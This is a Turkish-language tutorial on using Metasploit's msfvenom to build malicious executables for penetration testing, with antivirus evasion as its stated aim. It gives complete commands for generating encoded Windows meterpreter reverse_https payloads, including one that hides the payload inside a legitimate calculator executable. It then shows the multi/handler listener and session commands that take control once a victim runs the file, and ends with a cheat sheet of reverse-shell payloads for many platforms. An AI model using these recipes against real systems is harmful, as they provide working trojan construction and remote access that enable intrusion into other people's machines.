Msfvenom Aracı Kullanarak Zararlı Yazılım Oluşturma

Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Metasploit tarafından sağlanan msfvenom aracı kullanılarak antivirüslere yakalanmayan zararlı uygulamalar oluşturulacaktır.

Msfvenom; MsfPayload ve MsfEncode modüllerinin birleşimidir. Günümüzde bu modüller için destek kaldırılmış olup, bu modüller yerine Msfvenom kullanılması tavsiye edilmektedir. Msfvenom ile ilgili ayrıntılı bilgi için “-h” seçeneği kullanılabilir.

msfvenom -h

Msfvenom ile zararlı bir exe oluşturulması için örnek bir komut aşağıdaki gibidir:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.130 LPORT=443 -e x86/shikata_ga_nai -f exe -i 5 -b ‘x00’ > /root/Desktop/ZararliUygulama.exe

 

Not: Örnek bir kullanım da aşağıdaki gibidir:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.130 LPORT=443 -a x86 –platform windows -f raw -e x86/countdown -i 5 | msfvenom -a x86 –platform windows -e x86/shikata_ga_nai -i 5 -b ‘x00’ -f exe -x yasalUygulama_calc.exe -o /root/Desktop/ZararliUygulama.exe

 

Yukarıdaki komut kullanılarak Payload olarak “windows/meterpreter/reverse_https“, Encoder olarak da “x86/shikata_ga_nai ” kullanılmıştır. Encoder ve Payload kavramları hakkında ek bilgi için bakınız.

Kali makinenin /root/Desktop dizininde oluşan uygulama dosyası (ZararliUygulama.exe) istemci bir bilgisayara gönderilir. Bu uygulama tıklandığında bağlantı elde edilmesi için “exploit/multi/handler” modülü kullanılır:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST 192.168.0.130
msf exploit(handler) > set LPORT 443
msf exploit(handler) > show options

Exploit işlemi başlatılır ve exe uygulamasının tıklanması için beklenilir.

exploit -j

Zararlı uygulama tıklandığı durumda Payload çalışır ve bağlantı kurulur.

sessions -l
sessions -i 1
getuid

Hazırlanan zararlı uygulamanın, günümüzde bir çok antivirüs tarafından yakalandığı görülmektedir. Virüs.mu tarafından gerçekleştirilen tarama sonucunda 20 antivirüsten 16 tanesi tarafından yakalandığı görülmektedir:

Bunun yanında VirusTotal tarafından gerçekleştirilen tarama sonucunda 55 antivirüsten 38 tanesi tarafından yakalandığı görülmektedir.

 

Msfvenom ile en çok kullanılan payload’lar ve formatları aşağıdaki gibi listelenebilir.

• Linux Payload (-p): linux/x86/meterpreter/reverse_tcp
  Linux Format (-f): elf
• Windows Payload (-p): windows/meterpreter/reverse_tcp
  Windows Format (-f): exe
• MAC Payload (-p): osx/x86/shell_reverse_tcp
  MAC Format (-f): macho
• PHP Payload (-p): php/meterpreter_reverse_tcp
  PHP Format (-f): php
• ASP Payload (-p): windows/meterpreter/reverse_tcp
  ASP Format (-f): asp
• JSP Payload (-p): java/jsp_shell_reverse_tcp
  JSP Format (-f): raw
• WAR Payload (-p): java/jsp_shell_reverse_tcp
  WAR Format (-f): war
• Python Payload (-p): cmd/unix/reverse_python
  Python Format (-f): raw
• Bash Payload (-p): cmd/unix/reverse_bash
  Bash Format (-f): raw
• Perl Payload (-p): cmd/unix/reverse_perl
  Perl Format (-f): raw

 

 

Kaynaklar:

http:// [Zararli URL Kategorisinde] security-geek. [Zararli URL Kategorisinde] in/2016/09/07/msfvenom-cheat-sheet/
http://www.kursatoguzhanakinci.com/2015/07/msfvenom-kullanm-detayl.html
https://netsec.ws/?p=331